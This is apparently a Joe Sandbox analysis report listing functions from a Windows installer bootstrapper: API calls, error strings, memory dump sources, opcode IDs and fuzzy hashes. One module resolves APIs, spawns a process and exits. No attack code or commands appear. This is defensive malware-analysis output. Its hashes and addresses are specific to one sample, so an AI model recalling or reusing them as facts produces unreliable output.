                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                    • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                                                                    • API String ID: 1866314245-2276003667
                                                                                                                                                                    • Opcode ID: 1aa864e04c9061c2bf7e26a4375a6cf61bf0fe33cf6637cc87cceea42bf5a9cd
                                                                                                                                                                    • Instruction ID: e847a7ecd679d358c2f01afb205b340ed072f7b3a26d70b6abd540cd175f215d
                                                                                                                                                                    • Opcode Fuzzy Hash: 1aa864e04c9061c2bf7e26a4375a6cf61bf0fe33cf6637cc87cceea42bf5a9cd
                                                                                                                                                                    • Instruction Fuzzy Hash: 9411B677A80B36A7D72167D5DC05F1B6794AB05B65F01053DFE55EB1C0D620DC0047D8
                                                                                                                                                                    Function 00C8F812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00C8F942
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00C8F94F
                                                                                                                                                                    Strings
                                                                                                                                                                    • Resume, xrefs: 00C8F8B6
                                                                                                                                                                    • Failed to format pending restart registry key to read., xrefs: 00C8F846
                                                                                                                                                                    • Failed to read Resume value., xrefs: 00C8F8D8
                                                                                                                                                                    • Failed to open registration key., xrefs: 00C8F8AB
                                                                                                                                                                    • %ls.RebootRequired, xrefs: 00C8F82F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close
                                                                                                                                                                    • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                                                    • API String ID: 3535843008-3890505273
                                                                                                                                                                    • Opcode ID: cebd4cb1c661c27347c880c2b72d6899bd5be3ce9cb124655944e1464af67f2b
                                                                                                                                                                    • Instruction ID: 1dcf75b1b18785196029b22d881c38ff6aab71282dc7c2023ef9c5502a880dfe
                                                                                                                                                                    • Opcode Fuzzy Hash: cebd4cb1c661c27347c880c2b72d6899bd5be3ce9cb124655944e1464af67f2b
                                                                                                                                                                    • Instruction Fuzzy Hash: B7415271900119FFCB11AF99C841BADBBB4FB05318F55417EE921AB250C3719E52DB54
                                                                                                                                                                    Function 5BB31332 Relevance: 12.1, APIs: 8, Instructions: 78libraryloadersleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32 ref: 5BB31342
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 5BB31357
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 5BB31363
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00000104), ref: 5BB31377
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 5BB313E9
                                                                                                                                                                    • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 5BB313FF
                                                                                                                                                                    • Sleep.KERNELBASE ref: 5BB31407
                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 5BB3140C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$ModuleProcess$CreateExitFileHandleNameSleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1148150840-0
                                                                                                                                                                    • Opcode ID: f0dd7a59c0bd5b43b3f9e5f35ad75e2b2e8d3d451f964b30678343650819a50a
                                                                                                                                                                    • Instruction ID: 29308b35581844d5fbda9ce5f776adae6960d5a29273f979bf2b02e5f9c33764
                                                                                                                                                                    • Opcode Fuzzy Hash: f0dd7a59c0bd5b43b3f9e5f35ad75e2b2e8d3d451f964b30678343650819a50a
                                                                                                                                                                    • Instruction Fuzzy Hash: C521A172504314AFE712ABA4CC44AABBBEDFF48344F10442CF181A3590FBF6A844D792
                                                                                                                                                                    Function 00CC0523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00CEB5FC,00000000,?,?,?,00C94207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00C854FA,?), ref: 00CC0533
                                                                                                                                                                    • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,00CEB5F4,?,00C94207,00000000,Setup), ref: 00CC05D7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C94207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00C854FA,?,?,?), ref: 00CC05E7
                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00C94207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00C854FA,?), ref: 00CC0621
                                                                                                                                                                      • Part of subcall function 00C82DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00C82F09
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00CEB5FC,?,?,00CEB5F4,?,00C94207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00C854FA,?), ref: 00CC067A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                                                    • String ID: logutil.cpp
                                                                                                                                                                    • API String ID: 4111229724-3545173039
                                                                                                                                                                    • Opcode ID: 2e051ece6806d8536bfd75fd9287b4702e2d6dc715b330666320e3d66663c6b3
                                                                                                                                                                    • Instruction ID: 3bfd8e04fb4f3508288ca00f1c4ecd447815d2f62ac8c310592a04179f4e602c
                                                                                                                                                                    • Opcode Fuzzy Hash: 2e051ece6806d8536bfd75fd9287b4702e2d6dc715b330666320e3d66663c6b3
                                                                                                                                                                    • Instruction Fuzzy Hash: D031E77190126AFFDB219FA5CD8AF7E7768EB00755F100129FD10AB160D770DE60ABA4
                                                                                                                                                                    Function 00CA0B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to write during cabinet extraction., xrefs: 00CA0C35
                                                                                                                                                                    • Unexpected call to CabWrite()., xrefs: 00CA0BC1
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA0C2B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                                    • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                                                                    • API String ID: 1970631241-3111339858
                                                                                                                                                                    • Opcode ID: c7b32885f2ff9f086a982dbeb7f0e68d4175beac42705d12e35a6167cf135872
                                                                                                                                                                    • Instruction ID: a3b460157d54a8f765b5a53962f65f12c4c38166279381c2b7cd3267f47c4c82
                                                                                                                                                                    • Opcode Fuzzy Hash: c7b32885f2ff9f086a982dbeb7f0e68d4175beac42705d12e35a6167cf135872
                                                                                                                                                                    • Instruction Fuzzy Hash: 10210176540202ABCB10DF5DD985E5A37B8FF89768F21015AFE14C7342E632EE00DB61
                                                                                                                                                                    Function 00CC0879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenProcessToken.ADVAPI32(?,00000008,?,00C853BD,00000000,?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC0897
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC08A1
                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC08D3
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC08EC
                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC092B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                                    • String ID: procutil.cpp
                                                                                                                                                                    • API String ID: 4040495316-1178289305
                                                                                                                                                                    • Opcode ID: 22847037515cd724972d6e5daadd69bd03ed61203edf946f855d8beaf5f17748
                                                                                                                                                                    • Instruction ID: 3f39fcc4ee0e5ebb94692f3e51a137bea9c9255aa970a51ec31b0da87f8a75ff
                                                                                                                                                                    • Opcode Fuzzy Hash: 22847037515cd724972d6e5daadd69bd03ed61203edf946f855d8beaf5f17748
                                                                                                                                                                    • Instruction Fuzzy Hash: 5521C672E40229EBD7219B95CC05F9EBBB8EF10710F21816AED55EB291D3708E00DBD0
                                                                                                                                                                    Function 00CA0C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00CA0CC4
                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CA0CD6
                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CA0CE9
                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00CA08B1,?,?), ref: 00CA0CF8
                                                                                                                                                                    Strings
                                                                                                                                                                    • Invalid operation for this state., xrefs: 00CA0C9D
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA0C93
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                                    • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                    • API String ID: 609741386-1751360545
                                                                                                                                                                    • Opcode ID: b9734200ce5ae719579864c9372bbffdd0c87267e70ca4b7db799542608ec0ce
                                                                                                                                                                    • Instruction ID: 2181e725e492c65eb298f774c3d2e1e26f11b1a3c13527ba1fc43bc53c64e373
                                                                                                                                                                    • Opcode Fuzzy Hash: b9734200ce5ae719579864c9372bbffdd0c87267e70ca4b7db799542608ec0ce
                                                                                                                                                                    • Instruction Fuzzy Hash: AB21D57280021AAB87109FA8CD49ABE7BBCFF05764B20421AF865D65D0D370EE11CB90
                                                                                                                                                                    Function 00CC3565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00CC3574
                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00CEB6C8), ref: 00CC3591
                                                                                                                                                                    • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,00CEB6B8,?,?,?,?,?,?), ref: 00CC35AC
                                                                                                                                                                    • CLSIDFromProgID.OLE32(MSXML.DOMDocument,00CEB6B8,?,?,?,?,?,?), ref: 00CC35B8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                                                                    • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                                                    • API String ID: 2109125048-2356320334
                                                                                                                                                                    • Opcode ID: ee416caf79c466ed35b8c9f252c6e2eed26eab2faca592baf164e6554c1fa73d
                                                                                                                                                                    • Instruction ID: 8865ee24a39b927121c9590a0239219845e1ca03e309d3c76dfd3a50141e6fa0
                                                                                                                                                                    • Opcode Fuzzy Hash: ee416caf79c466ed35b8c9f252c6e2eed26eab2faca592baf164e6554c1fa73d
                                                                                                                                                                    • Instruction Fuzzy Hash: 74F03030B802E657D7251BA2FD0AF2F2D699B91B99F04452DFC00D6164D760DE818AB1
                                                                                                                                                                    Function 00CC4A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00CC4A9D
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00CC4ACA
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00CC4AF6
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00CCB7A0,?,00000000,?,00000000,?,00000000), ref: 00CC4B34
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00CC4B65
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 1145190524-2967768451
                                                                                                                                                                    • Opcode ID: a53d8c4ded51a777da17438e470602c9d33fa341c71e22efadc5224b818c71f2
                                                                                                                                                                    • Instruction ID: b537e95a8c386ed607a4420ef0f96d1768d8440b28b0320cddf59bba6455ce7c
                                                                                                                                                                    • Opcode Fuzzy Hash: a53d8c4ded51a777da17438e470602c9d33fa341c71e22efadc5224b818c71f2
                                                                                                                                                                    • Instruction Fuzzy Hash: 0231E537E40629ABCB259A95CC61FAFFAB8EF44750F118169FD14E7241E730DD0096E4
                                                                                                                                                                    Function 00C9E956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DefWindowProcW.USER32(?,00000082,?,?), ref: 00C9E985
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00C9E994
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 00C9E9A8
                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00C9E9B8
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00C9E9D2
                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00C9EA31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3812958022-0
                                                                                                                                                                    • Opcode ID: 4750fcfcb9a01db16115b143425c82f4a3a19c14b909013dc68efb17ac81ec5b
                                                                                                                                                                    • Instruction ID: de49df0e47c44e52a73dd3149870f9a0b0279f223ab02419faa72aa091813aa0
                                                                                                                                                                    • Opcode Fuzzy Hash: 4750fcfcb9a01db16115b143425c82f4a3a19c14b909013dc68efb17ac81ec5b
                                                                                                                                                                    • Instruction Fuzzy Hash: E2218E72104154AFDF119FA8DC4DEAE3B69FF55311F144618F91AAA1B4CB31DD10EB50
                                                                                                                                                                    Function 00CA0A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00CA0B27
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?), ref: 00CA0B31
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to move file pointer 0x%x bytes., xrefs: 00CA0B62
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA0B55
                                                                                                                                                                    • Invalid seek type., xrefs: 00CA0ABD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2976181284-417918914
                                                                                                                                                                    • Opcode ID: 4a39d029828940ebdc5eecc9b5048bf09f5a2e49ac07cb2de73ced6ebfda4bde
                                                                                                                                                                    • Instruction ID: d8428f8b32019c1ffc0a3226c643bec56f5d1f4d5473b755c42ad3041b21f7e1
                                                                                                                                                                    • Opcode Fuzzy Hash: 4a39d029828940ebdc5eecc9b5048bf09f5a2e49ac07cb2de73ced6ebfda4bde
                                                                                                                                                                    • Instruction Fuzzy Hash: E831A132A4021BEFCB14DFA8D985E6EB779FB05768B248125FD2497651D330EE10DBA0
                                                                                                                                                                    Function 00C84115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,00C9A0E8,00000000,00000000,?,00000000,00C853BD,00000000,?,?,00C8D5B5,?), ref: 00C84123
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C9A0E8,00000000,00000000,?,00000000,00C853BD,00000000,?,?,00C8D5B5,?,00000000,00000000), ref: 00C84131
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,840F01E8,00C85489,?,00C9A0E8,00000000,00000000,?,00000000,00C853BD,00000000,?,?,00C8D5B5,?,00000000), ref: 00C8419A
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C9A0E8,00000000,00000000,?,00000000,00C853BD,00000000,?,?,00C8D5B5,?,00000000,00000000), ref: 00C841A4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                    • String ID: dirutil.cpp
                                                                                                                                                                    • API String ID: 1375471231-2193988115
                                                                                                                                                                    • Opcode ID: 215ffc45baa6305060f1faaf97c95f2683537f3e9018633fb3a13a9abaa965e7
                                                                                                                                                                    • Instruction ID: 10820df1830728647639c6bed71f27145184c2cc02ccb5bb6998a41b7a26a4bf
                                                                                                                                                                    • Opcode Fuzzy Hash: 215ffc45baa6305060f1faaf97c95f2683537f3e9018633fb3a13a9abaa965e7
                                                                                                                                                                    • Instruction Fuzzy Hash: D311273660033796DB393AE28C4DB3FA664EF71B6AF110021FD15EB140E3648E8093D9
                                                                                                                                                                    Function 00C93AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00CC0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00CEAAA0,00000000,?,00CC57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC0F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00C93FB5,feclient.dll,?,00000000,?,?,?,00C84B12), ref: 00C93B42
                                                                                                                                                                      • Part of subcall function 00CC10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00CC112B
                                                                                                                                                                      • Part of subcall function 00CC10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00CC1163
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue$CloseOpen
                                                                                                                                                                    • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                                                                                                                    • API String ID: 1586453840-3596319545
